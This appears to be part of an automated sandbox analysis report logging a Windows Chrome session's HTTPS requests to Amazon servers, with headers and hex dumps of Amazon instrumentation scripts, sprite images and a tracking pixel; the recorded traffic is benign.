                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 30061
                                                                                                                                  Server-Timing: cdn-cache-hit,cdn-pop;desc="FRA56-P7",cdn-rid;desc="FshAQDqXHONvtLCqgjcMksMrdBn6jWP43zOrBYVwT4qLsarVzP3qTA==",cdn-hit-layer;desc="REC",cdn-downstream-fbl;dur=5,provider;desc="cf"
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: FshAQDqXHONvtLCqgjcMksMrdBn6jWP43zOrBYVwT4qLsarVzP3qTA==
                                                                                                                                  2025-01-27 14:45:14 UTC1787INData Raw: 76 61 72 20 75 65 5f 6d 6f 64 75 6c 65 73 3d 5b 22 6c 61 74 65 6e 63 79 22 5d 2c 63 65 6c 5f 77 69 64 67 65 74 73 3d 5b 7b 63 3a 22 63 65 6c 77 69 64 67 65 74 22 7d 5d 2c 75 65 5f 63 65 6c 5f 6e 73 3d 22 6f 70 66 63 73 6d 2d 69 22 2c 75 65 5f 73 6b 63 3d 30 2c 75 65 5f 65 72 72 3d 7b 73 74 61 72 74 54 69 6d 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 26 26 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 26 26 2d 31 21 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 22 2f 2f 77 77 77 2e 61 6d 61 7a 6f 6e 2e 66 72 22 29 26 26 28 75 65 5f 6d 69 64 3d 22 41 31 33 56 31 49 42 33 56 49 59 5a 5a 48 22 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72
                                                                                                                                  Data Ascii: var ue_modules=["latency"],cel_widgets=[{c:"celwidget"}],ue_cel_ns="opfcsm-i",ue_skc=0,ue_err={startTimer:function(){}};window.location&&window.location.href&&-1!=window.location.href.indexOf("//www.amazon.fr")&&(ue_mid="A13V1IB3VIYZZH");(function(c){var


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  23192.168.2.549819108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:14 UTC605OUTGET /images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:15 UTC1069INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 1829
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: d8c2caa3-48db-4f95-a5c7-519f5c5d750a
                                                                                                                                  Last-Modified: Fri, 20 Mar 2020 12:31:03 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-151,/images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d
                                                                                                                                  Surrogate-Key: x-cache-151 /images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 07:01:26 GMT
                                                                                                                                  Cache-Control: max-age=86400,public
                                                                                                                                  Expires: Thu, 12 Dec 2024 05:26:12 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 f3d57c6f1e03e389abd50b7f7535cee4.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 29864
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: oWl1kOpo3eoQtWxTYXIi_sY7MK8yCJOlFFiuG45iduUmDa36X-YsPQ==
                                                                                                                                  2025-01-27 14:45:15 UTC1829INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 2c 6b 2c 67 2c 68 29 7b 76 61 72 20 63 3d 7b 7d 2c 62 2c 6e 3d 6b 2e 70 6c 75 67 69 6e 73 2c 65 3d 6b 2e 6d 69 6d 65 54 79 70 65 73 2c 6d 3d 6b 2e 75 73 65 72 41 67 65 6e 74 2c 66 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 22 45 72 72 6f 72 22 2c 70 3d 45 72 72 6f 72 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 20 21 21 28 66 2e 62 69 6e 64 26 26 66 2e 62 69 6e 64 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 2f 62 69 6e 64 2f 67 2c 6f 29 3d 3d 3d 70 26 26 66 2e 74 6f 53 74 72 69 6e 67 2e 74 6f
                                                                                                                                  Data Ascii: (function(a,k,g,h){var c={},b,n=k.plugins,e=k.mimeTypes,m=k.userAgent,f=Function.prototype,j=function(o){return typeof o!=="undefined"},d=function(){var o="Error",p=Error.toString();return !!(f.bind&&f.bind.toString().replace(/bind/g,o)===p&&f.toString.to


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  24192.168.2.549820108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:14 UTC762OUTGET /images/G/01/amazonui/sprites/aui_sprite_0007-1x._V383827579_.png HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:15 UTC966INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/png
                                                                                                                                  Content-Length: 16972
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 404c2843-6121-47d0-bd39-7343ec002b5c
                                                                                                                                  Date: Mon, 24 Jun 2024 07:11:25 GMT
                                                                                                                                  Cache-Control: max-age=630720000,public
                                                                                                                                  Last-Modified: Wed, 15 May 2013 01:55:34 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-164,/images/G/01/amazonui/sprites/aui_sprite_0007-1x
                                                                                                                                  Expires: Sun, 19 Jun 2044 07:11:25 GMT
                                                                                                                                  Surrogate-Key: x-cache-164 /images/G/01/amazonui/sprites/aui_sprite_0007-1x
                                                                                                                                  X-Nginx-Cache-Status: MISS
                                                                                                                                  Via: 1.1 a811170f30183becd909b501e545e756.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 18776029
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: G5-woi50C5EVLL8B11o9z8SfIFkyhBXN5d97oUL4Vkj1Hmin9gZ7lw==
                                                                                                                                  2025-01-27 14:45:15 UTC15418INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 02 58 08 03 00 00 00 7b 32 40 ba 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 03 00 50 4c 54 45 ff ff ff e1 e3 e6 d6 d8 db fc 9b 18 f7 98 1b 99 99 99 45 a2 c6 c3 5d 04 55 55 55 30 39 42 33 33 33 23 2a 31 00 00 00 e1 e3 e6 ce d0 d3 df aa 00 fc 9b 18 99 99 99 c6 95 00 45 a2 c6 c6 88 00 46 4c 53 39 41 4a 00 00 00 e1 e3 e6 d6 d8 db fc 9b 18 f7 98 1b 99 99 99 c6 95 00 45 a2 c6 c6 88 00 e4 79 11 66 66 66 55 55 55 4b 52 5b 46 4c 53 39 41 4a 00 00 00 e1 e3 e6 df aa 00 fc 9b 18 99 99 99 45 a2 c6 66 66 66 4b 52 5b 33 33 33 00 00 00 d1 d3 d6 ea bf 00 99 99 99 45 a2 c6 69 6e 75 00 00 00 e1 e3 e6 d1 d3 d6 ce d0 d3 ff c4 00 f7 ae 00 df aa 00 f1 a4 00 df 97 00 99 99 99 45 a2 c6 64 6b 73 53 5b 63 46
                                                                                                                                  Data Ascii: PNGIHDRX{2@sBITOPLTEE]UUU09B333#*1EFLS9AJEyfffUUUKR[FLS9AJEfffKR[333EinuEdksS[cF
                                                                                                                                  2025-01-27 14:45:15 UTC1554INData Raw: 9d f6 75 ce a9 8e 39 0b 9c d3 88 f4 f7 90 cb df c1 bf bf d7 69 ff 13 62 36 3f a1 d3 be ce 39 d5 31 67 81 73 1a 91 fe e9 37 47 7e 77 d3 ef 8e fc e6 9f 74 da bf 75 f7 ee ff f9 cc ff ec de 7d ab 4e fb 3a e7 54 c7 9c 05 ce 69 44 ba fd c8 f7 ff 46 f8 9b ef 1f b9 5d a7 fd db 76 7f e7 23 c2 47 be b3 fb 36 9d f6 75 ce a9 8e 39 0b 9c d3 88 f4 ad 7f c7 3a 76 ee bf 7f 4b a7 fd 7b ee c1 3a f5 ba 7b ee d1 69 5f ef 9c ea 97 b3 c0 39 8d 48 ff aa f3 fb 6d 3a bf eb 9f d3 db 0c cf 29 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 c5 4a 9f 33 36 e9 46 63 93 8c c9 b4 10 c3 eb f8 8b 03 1f 36 32 e9 43 dd 1f 32 32 c9 a8 eb f8 50 cc ae 43 f8 dc 81 cf 19 99 f4 a5 8e cf 1a 99 64 d4 75 7c 36 66 d7 21 fc e7 81 ff 34 32 e9 fe bd f7 1b 99 64 d4 75 dc 1f b3 eb f8 f3 03 07 0e fc b9
                                                                                                                                  Data Ascii: u9ib6?91gs7G~wtu}N:TiDF]v#G6u9:vK{:{i_9Hm:)D"H$D"H$D"J36Fc62C22PCdu|6f!42du


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  25192.168.2.54982954.88.216.1254433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:15 UTC390OUTGET /1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:15 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:15 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 97c9305e-71e1-4000-b388-ec2bfc8e2979
                                                                                                                                  2025-01-27 14:45:15 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  26192.168.2.549830108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:15 UTC616OUTGET /images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1._V313498596_.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:16 UTC1072INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 7210
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 54852007-44b6-4c89-a8fb-dfdc707ada3a
                                                                                                                                  Date: Sat, 25 May 2024 04:11:45 GMT
                                                                                                                                  Cache-Control: max-age=630720000,public
                                                                                                                                  Last-Modified: Wed, 26 Aug 2015 14:52:49 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-762,/images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1
                                                                                                                                  Expires: Fri, 20 May 2044 04:11:45 GMT
                                                                                                                                  Surrogate-Key: x-cache-762 /images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 45144f4effc6db6c846de623ab8b639a.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 11323811
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: ukIPBK7uoNZgBiDWyphYVYpDX0P_OqjNokCmBUjVMlKx2Vm6zhpfWw==
                                                                                                                                  2025-01-27 14:45:16 UTC7210INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 63 2e 75 65 3d 63 2e 75 65 7c 7c 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 62 28 68 2c 6a 2c 69 29 7b 76 61 72 20 67 3d 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 65 77 20 44 61 74 65 28 2b 6e 65 77 20 44 61 74 65 2b 69 29 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 3b 64 2e 63 6f 6f 6b 69 65 3d 68 2b 22 3d 22 2b 6a 2b 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 66 75 6e 63 74 69 6f 6e 20 61 28 67 29 7b 69 66 28 64 2e 63 6f 6f 6b 69 65 26 26 64 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 29 7b 76 61 72 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 6a 2c 6d 2c 6b 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 73 2a 22 2b 67 2b 22 3d 22 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 6c
                                                                                                                                  Data Ascii: (function(c,d){c.ue=c.ue||{};function b(h,j,i){var g="; expires="+new Date(+new Date+i).toGMTString();d.cookie=h+"="+j+g+"; path=/"}function a(g){if(d.cookie&&d.cookie.split){var l=document.cookie.split(";"),j,m,k=new RegExp("^\\s*"+g+"=");for(var h=0;h<l


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  27192.168.2.54983118.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:15 UTC420OUTGET /images/G/01/csminstrumentation/csm-captcha-instrumentation.min.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:15 UTC1047INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 1787
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: c7827ad0-89de-4739-9a4c-c59804ec2e3a
                                                                                                                                  Last-Modified: Mon, 12 Oct 2015 09:22:39 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-450,/images/G/01/csminstrumentation/csm-captcha-instrumentation.min
                                                                                                                                  Surrogate-Key: x-cache-450 /images/G/01/csminstrumentation/csm-captcha-instrumentation.min
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 07:01:26 GMT
                                                                                                                                  Cache-Control: max-age=86400,public
                                                                                                                                  Expires: Mon, 27 Jan 2025 13:40:12 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 9c920cc684a38b53bc9c7a44ba794874.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 30062
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: 0OmHkLYIISVIGYpgHu_sof3JlvfLe39Luv192C9GLjkrlnFXY7cGuw==
                                                                                                                                  2025-01-27 14:45:15 UTC1787INData Raw: 76 61 72 20 75 65 5f 6d 6f 64 75 6c 65 73 3d 5b 22 6c 61 74 65 6e 63 79 22 5d 2c 63 65 6c 5f 77 69 64 67 65 74 73 3d 5b 7b 63 3a 22 63 65 6c 77 69 64 67 65 74 22 7d 5d 2c 75 65 5f 63 65 6c 5f 6e 73 3d 22 6f 70 66 63 73 6d 2d 69 22 2c 75 65 5f 73 6b 63 3d 30 2c 75 65 5f 65 72 72 3d 7b 73 74 61 72 74 54 69 6d 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 26 26 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 26 26 2d 31 21 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 22 2f 2f 77 77 77 2e 61 6d 61 7a 6f 6e 2e 66 72 22 29 26 26 28 75 65 5f 6d 69 64 3d 22 41 31 33 56 31 49 42 33 56 49 59 5a 5a 48 22 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72
                                                                                                                                  Data Ascii: var ue_modules=["latency"],cel_widgets=[{c:"celwidget"}],ue_cel_ns="opfcsm-i",ue_skc=0,ue_err={startTimer:function(){}};window.location&&window.location.href&&-1!=window.location.href.indexOf("//www.amazon.fr")&&(ue_mid="A13V1IB3VIYZZH");(function(c){var


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  28192.168.2.54983218.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:15 UTC431OUTGET /images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:16 UTC1069INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 1829
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: d8c2caa3-48db-4f95-a5c7-519f5c5d750a
                                                                                                                                  Last-Modified: Fri, 20 Mar 2020 12:31:03 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-151,/images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d
                                                                                                                                  Surrogate-Key: x-cache-151 /images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 07:01:26 GMT
                                                                                                                                  Cache-Control: max-age=86400,public
                                                                                                                                  Expires: Thu, 12 Dec 2024 05:26:12 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 24fc4e03b1de2a14f79be2422e46a318.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 29865
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: VJfXfSSRMLtLOPNvE7eEtTSkER6hIqghmMJNXXkaM69r-Q_WtmLwdw==
                                                                                                                                  2025-01-27 14:45:16 UTC1829INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 2c 6b 2c 67 2c 68 29 7b 76 61 72 20 63 3d 7b 7d 2c 62 2c 6e 3d 6b 2e 70 6c 75 67 69 6e 73 2c 65 3d 6b 2e 6d 69 6d 65 54 79 70 65 73 2c 6d 3d 6b 2e 75 73 65 72 41 67 65 6e 74 2c 66 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 22 45 72 72 6f 72 22 2c 70 3d 45 72 72 6f 72 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 20 21 21 28 66 2e 62 69 6e 64 26 26 66 2e 62 69 6e 64 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 2f 62 69 6e 64 2f 67 2c 6f 29 3d 3d 3d 70 26 26 66 2e 74 6f 53 74 72 69 6e 67 2e 74 6f
                                                                                                                                  Data Ascii: (function(a,k,g,h){var c={},b,n=k.plugins,e=k.mimeTypes,m=k.userAgent,f=Function.prototype,j=function(o){return typeof o!=="undefined"},d=function(){var o="Error",p=Error.toString();return !!(f.bind&&f.bind.toString().replace(/bind/g,o)===p&&f.toString.to


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  29192.168.2.54983318.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:15 UTC419OUTGET /images/G/01/amazonui/sprites/aui_sprite_0007-1x._V383827579_.png HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:16 UTC987INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/png
                                                                                                                                  Content-Length: 16972
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 6e745ccc-1f9b-4b33-8df9-faceea56864a
                                                                                                                                  Date: Mon, 16 Sep 2024 11:47:09 GMT
                                                                                                                                  Cache-Control: max-age=630720000,public
                                                                                                                                  Last-Modified: Wed, 15 May 2013 01:55:34 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-685,/images/G/01/amazonui/sprites/aui_sprite_0007-1x
                                                                                                                                  Expires: Sun, 11 Sep 2044 11:47:09 GMT
                                                                                                                                  Surrogate-Key: x-cache-685 /images/G/01/amazonui/sprites/aui_sprite_0007-1x
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
